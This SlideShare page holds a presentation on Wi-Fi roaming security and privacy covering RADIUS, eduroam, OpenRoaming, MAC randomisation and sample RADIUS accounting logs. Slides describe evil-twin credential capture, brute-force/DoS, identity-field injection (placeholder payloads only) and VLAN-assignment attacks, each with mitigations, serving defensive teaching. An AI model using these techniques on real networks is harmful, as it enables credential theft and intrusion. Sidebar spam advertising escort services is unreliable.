OpenRoaming and CapPortOpenRoaming and CapPort
OpenRoaming and CapPortKarri Huhtanen
 
Suomen eduroam-juuripalvelun uudistukset
Suomen eduroam-juuripalvelun uudistuksetSuomen eduroam-juuripalvelun uudistukset
Suomen eduroam-juuripalvelun uudistuksetKarri Huhtanen
 
Adding OpenRoaming to existing IdP and roaming federation service
Adding OpenRoaming to existing IdP and roaming federation serviceAdding OpenRoaming to existing IdP and roaming federation service
Adding OpenRoaming to existing IdP and roaming federation serviceKarri Huhtanen
 
OpenRoaming -- Wi-Fi Roaming for All
OpenRoaming -- Wi-Fi Roaming for AllOpenRoaming -- Wi-Fi Roaming for All
OpenRoaming -- Wi-Fi Roaming for AllKarri Huhtanen
 
Beyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoaming
Beyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoamingBeyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoaming
Beyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoamingKarri Huhtanen
 
Routing host certificates in eduroam/govroam
Routing host certificates in eduroam/govroamRouting host certificates in eduroam/govroam
Routing host certificates in eduroam/govroamKarri Huhtanen
 
Cooperative labs, testbeds and networks
Cooperative labs, testbeds and networksCooperative labs, testbeds and networks
Cooperative labs, testbeds and networksKarri Huhtanen
 
Privacy and traceability in Wi-Fi networks
Privacy and traceability in Wi-Fi networksPrivacy and traceability in Wi-Fi networks
Privacy and traceability in Wi-Fi networksKarri Huhtanen
 
What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?Karri Huhtanen
 
What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?Karri Huhtanen
 
Building secure, privacy aware, quality Wi-Fi coverage via cooperation
Building secure, privacy aware, quality Wi-Fi coverage via cooperationBuilding secure, privacy aware, quality Wi-Fi coverage via cooperation
Building secure, privacy aware, quality Wi-Fi coverage via cooperationKarri Huhtanen
 
Connecting the Dots: Integrating RADIUS to Network Measurement and Monitoring
Connecting the Dots: Integrating RADIUS to Network Measurement and MonitoringConnecting the Dots: Integrating RADIUS to Network Measurement and Monitoring
Connecting the Dots: Integrating RADIUS to Network Measurement and MonitoringKarri Huhtanen
 
Building city and nationwide Wi-Fi coverage via cooperation
Building city and nationwide Wi-Fi coverage via cooperationBuilding city and nationwide Wi-Fi coverage via cooperation
Building city and nationwide Wi-Fi coverage via cooperationKarri Huhtanen
 
eduroam diagnostics in NTLR, IdPs and SPs
eduroam diagnostics in NTLR, IdPs and SPseduroam diagnostics in NTLR, IdPs and SPs
eduroam diagnostics in NTLR, IdPs and SPsKarri Huhtanen
 
Using NoSQL databases to store RADIUS and Syslog data
Using NoSQL databases to store RADIUS and Syslog dataUsing NoSQL databases to store RADIUS and Syslog data
Using NoSQL databases to store RADIUS and Syslog dataKarri Huhtanen
 
Open WiFi or Broken WiFi?
Open WiFi or Broken WiFi?Open WiFi or Broken WiFi?
Open WiFi or Broken WiFi?Karri Huhtanen
 
Cloud Based Identity Management
Cloud Based Identity ManagementCloud Based Identity Management
Cloud Based Identity ManagementKarri Huhtanen
 
eduroam ennen, nyt ja tulevaisuudessa
eduroam ennen, nyt ja tulevaisuudessaeduroam ennen, nyt ja tulevaisuudessa
eduroam ennen, nyt ja tulevaisuudessaKarri Huhtanen
 

More from Karri Huhtanen (20)

OpenRoaming and CapPort
OpenRoaming and CapPortOpenRoaming and CapPort
OpenRoaming and CapPort
 
Suomen eduroam-juuripalvelun uudistukset
Suomen eduroam-juuripalvelun uudistuksetSuomen eduroam-juuripalvelun uudistukset
Suomen eduroam-juuripalvelun uudistukset
 
Adding OpenRoaming to existing IdP and roaming federation service
Adding OpenRoaming to existing IdP and roaming federation serviceAdding OpenRoaming to existing IdP and roaming federation service
Adding OpenRoaming to existing IdP and roaming federation service
 
OpenRoaming -- Wi-Fi Roaming for All
OpenRoaming -- Wi-Fi Roaming for AllOpenRoaming -- Wi-Fi Roaming for All
OpenRoaming -- Wi-Fi Roaming for All
 
Beyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoaming
Beyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoamingBeyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoaming
Beyond eduroam: Combining eduroam, (5G) SIM authentication and OpenRoaming
 
Routing host certificates in eduroam/govroam
Routing host certificates in eduroam/govroamRouting host certificates in eduroam/govroam
Routing host certificates in eduroam/govroam
 
Cooperative labs, testbeds and networks
Cooperative labs, testbeds and networksCooperative labs, testbeds and networks
Cooperative labs, testbeds and networks
 
Privacy and traceability in Wi-Fi networks
Privacy and traceability in Wi-Fi networksPrivacy and traceability in Wi-Fi networks
Privacy and traceability in Wi-Fi networks
 
EAP-TLS
EAP-TLSEAP-TLS
EAP-TLS
 
TLS and Certificates
TLS and CertificatesTLS and Certificates
TLS and Certificates
 
What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?
 
What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?What is Network Function Virtualisation (NFV)?
What is Network Function Virtualisation (NFV)?
 
Building secure, privacy aware, quality Wi-Fi coverage via cooperation
Building secure, privacy aware, quality Wi-Fi coverage via cooperationBuilding secure, privacy aware, quality Wi-Fi coverage via cooperation
Building secure, privacy aware, quality Wi-Fi coverage via cooperation
 
Connecting the Dots: Integrating RADIUS to Network Measurement and Monitoring
Connecting the Dots: Integrating RADIUS to Network Measurement and MonitoringConnecting the Dots: Integrating RADIUS to Network Measurement and Monitoring
Connecting the Dots: Integrating RADIUS to Network Measurement and Monitoring
 
Building city and nationwide Wi-Fi coverage via cooperation
Building city and nationwide Wi-Fi coverage via cooperationBuilding city and nationwide Wi-Fi coverage via cooperation
Building city and nationwide Wi-Fi coverage via cooperation
 
eduroam diagnostics in NTLR, IdPs and SPs
eduroam diagnostics in NTLR, IdPs and SPseduroam diagnostics in NTLR, IdPs and SPs
eduroam diagnostics in NTLR, IdPs and SPs
 
Using NoSQL databases to store RADIUS and Syslog data
Using NoSQL databases to store RADIUS and Syslog dataUsing NoSQL databases to store RADIUS and Syslog data
Using NoSQL databases to store RADIUS and Syslog data
 
Open WiFi or Broken WiFi?
Open WiFi or Broken WiFi?Open WiFi or Broken WiFi?
Open WiFi or Broken WiFi?
 
Cloud Based Identity Management
Cloud Based Identity ManagementCloud Based Identity Management
Cloud Based Identity Management
 
eduroam ennen, nyt ja tulevaisuudessa
eduroam ennen, nyt ja tulevaisuudessaeduroam ennen, nyt ja tulevaisuudessa
eduroam ennen, nyt ja tulevaisuudessa
 

Recently uploaded

Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 

Recently uploaded (20)

Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 

Wi-Fi roaming security and privacy 2023

  • 1. Wi-Fi roaming security and privacy 2023-02-23 Karri Huhtanen
  • 2. Karri Huhtanen ● Installed first Linux distribution ~1993 (Softlanding Linux System, didn’t know how to exit emacs or vi) ● Have had Internet access since 1993 (but purchased first Internet subscription in 2006) ● Have worked with wireless networks, security and roaming since 1997 ● Was there to connect Finland to eduroam in 2003 (maintained eduroam Finland top-level RADIUS since then) ● Founded Arch Red Oy (nowadays Radiator Software Oy) in Tampere University of Technology in 2003 with two colleagues to productise Wi-Fi access control and roaming solutions (e.g. roam.fi)
  • 3. This may not be the Wi-Fi network security presentation you are looking for… ● This is a presentation about Wi-Fi roaming security and privacy => e.g. local Wi-Fi network security, radio protocols is covered only briefly ● If there is interest I can do presentation about local Wi-Fi network security as well some other time / event. ● In Slideshare I do have a presentation about that topic: https://www.slideshare.net/khuhtanen/security-issues-in-radius-based-wifi-aaa and more: https://www.slideshare.net/khuhtanen/presentations ● And I am looking for a replacement for Slideshare, because Scribd has reduced the usability of the service with forced advertisements etc.
  • 4. So let’s start with Wi-Fi network security … :) with slides about Wi-Fi roaming basics as well
  • 5. How does WPA2/3 Enterprise AAA work? EAP-PWD EAP method based on elliptic Curves, real identity shown EAP-TTLS, TLS secured “envelope” EAP-PEAP outer identity can be anonymous or real identity EAP-TLS Certificate based EAP method, certificate details can be seen EAP-SIM, SIM card based EAP method, EAP-AKA(‘) temporary identities etc. User credentials (username+password, certificate, SIM card) travel within encrypted EAP envelope Network Access Server (NAS): E.g Wi-Fi controller, Wi-Fi AP RADIUS AAA server software RADIUS protocol WPA2/3 Enterprise Authentication
  • 6. So where does WPA2/3 Enterprise AAA fail? ● Very rarely with technology ● Sometimes with network and security design ● Often with misconfiguration or lack of configuration provisioning ● Most commonly with end users and manual device configuration
  • 7. What is the difference between WPA2 and WPA3? ● WPA3 mandates Protected Management Frames (PMF), WPA2 has those, but by default does not mandate their use ● WPA3 has additional stronger encryption methods, improvements in the key exchange (SAE instead of PSK) ● WPA2 will still be around and can be secured more with mandating PMF and disabling WPA1, TKIP compatibility
  • 8. Visited organisation (VO) Wi-Fi network How does Wi-Fi RADIUS roaming work? NAS Roaming visitor’s device Outer identity:anonymous@example.com Inner identity: realusername@example.com 1 Roaming visitor (anonymous@example.com) want to join to this Wi-Fi network 2 NAS forwards request to VO RADIUS server. As example.com is not VO realm, RADIUS server proxies request to its default server 3 Federation Top Level RADIUS server knows that realm example.com is handled by example.com RADIUS server and proxies request to it 4 Home organisation (example.com) RADIUS server and example.com user device negotiate and arrange TLS secured tunnel for authentication. Authentication happens between example.com user device and example.com RADIUS server using the infrastructure in between. 5 Home organisation RADIUS server makes OK or NOT decision based on the authentication and returns access decision response via same infrastructure route 6 NAS lets example.com user device connect (or not) to the VO Wi-Fi network based on the proxied RADIUS response
  • 9. Radiator Auth.Fi Enterprise Wi-Fi as a service Redundant roam.fi RADIUS service in public cloud RADIUS based roaming federation Tampere University RADIUS Other customers connecting via RADIUS, e.g. City of Seinäjoki, Seinäjoki education etc. Default RADIUS route for all roam.fi members, but no own default RADIUS route RADIUS RADIUS RADIUS RADIUS
  • 10. example.org RADIUS server example.com RADIUS server How does OpenRoaming work? (https://wballiance.com/openroaming/) Passpoint (Hotspot 2.0) compatible Wi-Fi network SSID: *any* RCOI (Settled): BA-A2-D0-xx-xx or RCOI (Settlement-Free): 5A-03-BA-xx-xx RADIUS capable Wi-Fi controller or example.net’s own RADIUS server OpenRoaming Settled or Settlement-Free Access Service Provider Static Radius over TLS (RadSec, RFC 6614) connection Passpoint (Hotspot 2.0) compatible Wi-Fi network SSID: *any* RCOI (Settled): BA-A2-D0-xx-xx or RCOI (Settlement-Free): 5A-03-BA-xx-xx Global Public DNS Passpoint (Hotspot 2.0) compatible Wi-Fi network SSID: *any* RCOI (Settled): BA-A2-D0-xx-xx or RCOI (Settlement-Free): 5A-03-BA-xx-xx DNS discovery: NAPTR aaa+auth:radius.tls.tcp <realm> SRV <NAPTR result> Name lookup <SRV result> Dynamic RadSec connection to example.net’s IdP service provider Dynamic RadSec connections to example.com IdP Dynamic RadSec connection to example.org IdP user@example.com user@example.net user2@example.com user@example.org
  • 12. Attacker sets up an Evil Twin Wi-Fi network Evil Twin Man-in-the-Middle (MitM) attack NAS Victim’s device Outer identity: anonymous@example.com Inner identity: realusername@example.com Federation Top Level RADIUS server 2) Victim’s device tries to negotiate TLS connection over RADIUS with home organisation RADIUS but evil twin intercepts and tries to impersonate home organisation RADIUS server. Federation RADIUS connectivity is not needed. The evil twin just needs to be able to terminate the TLS tunnel for RADIUS authentication. There have been accidental and ignorant evil twin RADIUS server configurations in organisations. 1) Evil twin sets up a Wi-Fi network with the Wi-Fi network name (SSID) or Roaming Consortium Organisation Identifier (RCOI) as the real roaming network provider. Victim’s device tries automatically to join this network. 3) If victim’s device does not have a proper Wi-Fi network configuration, or capabilities, to check the RADIUS server details, the device may send the credentials (username, password, password hash) to the attacker’s RADIUS server.
  • 13. Evil Twin attack mitigation ● Proper Wi-Fi configuration profiles (eduroam-cat/geteduroam.app, Windows policies, Apple Configurator) ● Using Private CA signed RADIUS server certificate instead of well-known or system CA (Android) signed one => impersonation with another certificate signed by the same CA does not work (some devices cannot check the certificate CN or SubjectAltNames) ● Using client-certificate authentication (EAP-TLS) or EAP-PWD => no credentials sent, but identity may be still sent ● Rogue access point detection and isolation features in Wi-Fi controllers ● Using separate network credentials (different username and password) or Multi-Factor Authentication => lost credentials are less valuable or do not work
  • 14. Visited organisation (VO) Wi-Fi network Brute force / Denial of Service (DoS) attack NAS Attacker’s device Outer identity: anonymous@example.com Inner identity: victim@example.com Password: password guess 1) Attacker tries to bruteforce victim’s password by using visited organisation’s Wi-Fi network and roaming infrastructure 2) example.com RADIUS server tries to authenticate victim@example.com from authentication backend (Active Directory, SQL, LDAP etc.) Roaming infrastructure or RADIUS servers do not usually have any rate-limiting. The round trip time for single roaming authentication is usually 1-5 seconds. 3) example.com RADIUS server authentication backend responds to all requests, but may also lock the user account for a while or completely (DoS)
  • 15. Brute force / Denial of Service (DoS) mitigation ● Rate limiting RADIUS requests in the home organisation RADIUS server ○ Can be complex to design, implement and configure depending on the EAP protocol and inner EAP authentication method ○ Contributes to Denial of Service attack ● Rate limiting requests the in home organisation authentication backend ○ Backends may not have support for rate limiting ○ Contributes to Denial of Service attack ● Rate limiting in the Wi-Fi network controller or Visited Organisation RADIUS server ○ Some support exists for detecting devices failing multiple authentication requests in the controllers ● Automatic locking and unlocking of the user account ● Rate limiting is rarely done because real attacks are equally rare
  • 16. Visited organisation (VO) Wi-Fi network Injection attack NAS Attacker’s device Outer identity: <exploit>@victim.domain Inner identity: <exploit>@victim.domain | <exploit> Password: <exploit> 1) Attacker inserts the exploit (log4j, SQL, JavaScript, XSS, HTML …) payload to outer or inner identity or password instead of the credentials 3) victim.domain systems processing outer/inner identity and password are exposed to the exploit 2) Any device, RADIUS server, centralised log system, web based user interface etc. which processes or displays the outer identity is exposed to the exploit.
  • 17. Injection attack comments and mitigation Comments ● There have not yet been successful public cases or occurrences of this attack ● In eduroam this was tested when log4j exploit was published but just placing log4j exploit in the RADIUS request did not work ● Maximum length of an RADIUS attribute is 253 characters, which limits exploits Mitigation ● Sanitising inputs in software ● Sanitising User-Name (outer identity), inner identity and password in RADIUS servers ○ Done sometimes for example for whitespaces in User-Name ○ Done also sometimes for specific characters, but extra care needs to be taken to not break legit requests ○ Only home organisation is exposed to the exploit placed in the inner identity or password
  • 18. Visited organisation (VO) Wi-Fi network VLAN penetration attack NAS Attacker’s device Outer identity: anonymous@attacker.com Inner identity: realusername@attacker.com Password: realpassword 1) Attacker tries to authenticate to the Visited Organisation Wi-Fi network using roaming credentials from attacker controlled RADIUS server Roaming federation servers often clean at least the standard VLAN assignment attributes from the request but mostly pass all RADIUS attributes through. 2) Attacker’s RADIUS server accepts attacker authentication and includes in its response VLAN assignment attributes targeted at VO’s Wi-Fi equipment. 3) If VO RADIUS does not strip VLAN assignment from responses coming from roaming federation the attributes are passed to the Wi-Fi network equipment as they are 4) If VO uses VLAN assignment in its Wi-Fi network, the Wi-Fi network equipment drops attacker’s device to the VLAN defined by attacker’s RADIUS server.
  • 19. VLAN penetration attack mitigation ● Strip standard and vendor specific VLAN assignment RADIUS attributes in the own organisation RADIUS server ● Strip attributes in the other federation RADIUS servers ● Take care what organisations can join the roaming federation and in identifying them
  • 21. You may have seen this in the Internet …
  • 22. It’s funny, because it’s true... (at least with these adjustments) MAC ADDRESS TRACKING YOUR DEVICE
  • 23. MAC addresses, we all got them... ● Most of the network interfaces on your device have a unique address called a MAC address ● Wi-Fi and Bluetooth interfaces may “broadcast” the address even if the interface is not in active use
  • 24. MAC addresses are used ... ● to identify devices and users ● to control access to network ● to limit use of network resources ● to keep track of sessions ● to assign and track IP addresses ● to track devices => to track persons
  • 25. Wi-Fi devices send so called probe requests to find out what Wi-Fi networks are available and they may do this even if Wi-Fi is turned off. Bluetooth devices respond to queries and may do own probing as well. This makes it possible to track for example people and their movements in shopping malls. => nice tracking business. 7 people hanging near certain store person’ s path recurring visitor
  • 26. MAC address randomisation ● first done only in the probe requests ● has been extended to network connections ● is currently per Wi-Fi network (profile) ● is expected in the future to be time-based as well ● is enabled by default in Android 10,11, iOS/iPadOS 14+
  • 27. Check also globalreachtech.com WWW pages for more analysis of MAC address randomisation by Dr Chris Spencer
  • 28. Randomised MAC address does not stop tracking ● In most devices randomised MAC address only changes when a network or profile is deleted and create again => recurring visitors can be identified at least within same network ● In authenticated and roaming networks MAC address does not really matter, User-Name and Chargeable-User-Identity can be used if these are not protected ● User-Name and Chargeable-User-Identity are sent in clear text ○ EAP-TLS with TLS<1.3, PEAP/EAP-TTLS, EAP-SIM / EAP-AKA / EAP-AKA’ without IMSI Privacy ● While WPA2/3 authentication protects RADIUS authentication with TLS, RADIUS accounting is sent in clear text
  • 29. EAP-SIM/EAP-AKA/EAP-AKA’ privacy EAP-SIM, EAP-AKA and EAP-AKA’ are SIM-based WiFi authentication methods used to achieve seamless offloading to carrier and partner WiFi. International Mobile Subscriber Identifier (IMSI) derived from the SIM card is the unique identifier for each user. On the first connection to a WiFi network, the mobile device communicates its permanent subscriber identity information (IMSI), which is then sent to the home operator for authentication. Without IMSI Privacy features, this identity is sent in the clear. A potential 3rd party adversary installing a WiFi sniffer in the vicinity of such networks can harvest permanent identities and track users. This tracking can also be done by the venue or network owner when connecting to the WiFi network. Example: warning in iOS when joining WiFi without IMSI privacy in place
  • 30. RADIUS Accounting Start message e86bff00 Thu Feb 23 14:50:10 2023 594131: DEBUG: Packet dump: e86bff00 *** Received from 10.255.255.245 port 61503 .... e86bff00 Code: Accounting-Request e86bff00 Identifier: 1 e86bff00 Authentic: <167>[<8>i+<250><208><242><12>A<179><226>d<183><183>S e86bff00 Attributes: e86bff00 Acct-Status-Type = Start e86bff00 NAS-IP-Address = 10.255.255.245 e86bff00 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org" e86bff00 NAS-Port = 0 e86bff00 NAS-Port-Type = Wireless-IEEE-802-11 e86bff00 Calling-Station-Id = "aa2b0b553528" e86bff00 Called-Station-Id = "6026efcdcdc4" e86bff00 Framed-IP-Address = 172.16.145.111 e86bff00 Acct-Multi-Session-Id = "AA2B0B553528-1677156607" e86bff00 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448" e86bff00 Acct-Delay-Time = 0 e86bff00 Aruba-Essid-Name = "RS-TEST" e86bff00 Aruba-Location-Id = "rs-aruba-ap-1" e86bff00 Aruba-User-Vlan = 145 e86bff00 Aruba-User-Role = "RS-TEST" e86bff00 Aruba-Device-Type = "NOFP" e86bff00 Acct-Authentic = RADIUS e86bff00 Service-Type = Login-User e86bff00 NAS-Identifier = "rs-aruba-ap-1" e86bff00 Note IMSI in the User-Name, MAC addresses, IP addresses, Session-Ids, Aruba vendor specific RADIUS attributes.
  • 31. RADIUS Accounting Stop message d5b39070 Thu Feb 23 14:53:52 2023 182291: DEBUG: Packet dump: d5b39070 *** Received from 10.255.255.245 port 61503 .... d5b39070 Code: Accounting-Request d5b39070 Identifier: 1 d5b39070 Authentic: <188>9>g[<186><157>U|`<244><143>"<171><183><127> d5b39070 Attributes: d5b39070 Acct-Status-Type = Stop d5b39070 NAS-IP-Address = 10.255.255.245 d5b39070 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org" d5b39070 NAS-Port = 0 d5b39070 NAS-Port-Type = Wireless-IEEE-802-11 d5b39070 Calling-Station-Id = "aa2b0b553528" d5b39070 Called-Station-Id = "6026efcdcdc4" d5b39070 Framed-IP-Address = 172.16.145.111 d5b39070 Acct-Multi-Session-Id = "AA2B0B553528-1677156607" d5b39070 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448" d5b39070 Acct-Delay-Time = 0 d5b39070 Aruba-Essid-Name = "RS-TEST" d5b39070 Aruba-Location-Id = "rs-aruba-ap-1" d5b39070 Aruba-User-Vlan = 145 d5b39070 Aruba-User-Role = "RS-TEST" d5b39070 Aruba-Device-Type = "NOFP" d5b39070 Acct-Input-Octets = 35954 d5b39070 Acct-Output-Octets = 855517 d5b39070 Acct-Input-Packets = 549 d5b39070 Acct-Output-Packets = 453 d5b39070 Acct-Input-Gigawords = 0 Note also one Location attribute. There are a lot more related attributes in the standardisation process and under development is also a technology called Wi-Fi sensing, which probably also brings new attributes to RADIUS requests.
  • 32. How to protect privacy? ● Use MAC address randomisation ● Use anonymous outer identity in Wi-Fi configurations ● Don’t send RADIUS accounting if it is not required (eduroam recommendation) ● Use RadSec (RADIUS over TLS, RFC 6614) to protect both authentication and accounting (OpenRoaming requirement) ● Use EAP-TLS with TLSv1.3 support for client certificate authentication ● Use IMSI Privacy Protection supporting clients, server software and operator
